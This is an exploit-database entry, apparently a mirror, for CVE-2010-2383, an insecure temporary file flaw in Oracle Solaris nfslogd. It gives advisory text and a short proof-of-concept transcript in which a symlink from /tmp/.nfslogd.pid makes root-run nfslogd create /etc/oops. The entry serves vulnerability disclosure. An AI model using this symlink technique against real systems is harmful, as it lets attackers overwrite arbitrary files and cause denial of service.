[] NeoSense
E X P L O I T S
title author type platform port cve id

Oracle Solaris - 'nfslogd' Insecure Temporary File Creation

Author: Frank Stuart
type: local
platform: solaris
port: 
date_added: 2010-07-13 
date_updated: 2014-08-11 
verified: 1 
codes: CVE-2010-2383;OSVDB-66367 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/41637/info

Oracle Solaris is prone to an insecure temporary file creation vulnerability.

A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.

This vulnerability affects the following supported versions:
8, 9, 10, OpenSolaris

nnDon't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx   1 nobody   nobody         9 Dec 29 21:24 /tmp/.nfslogd.pid
-> /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
-rw-------   1 root     root           4 Dec 29 21:25 /etc/oops
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.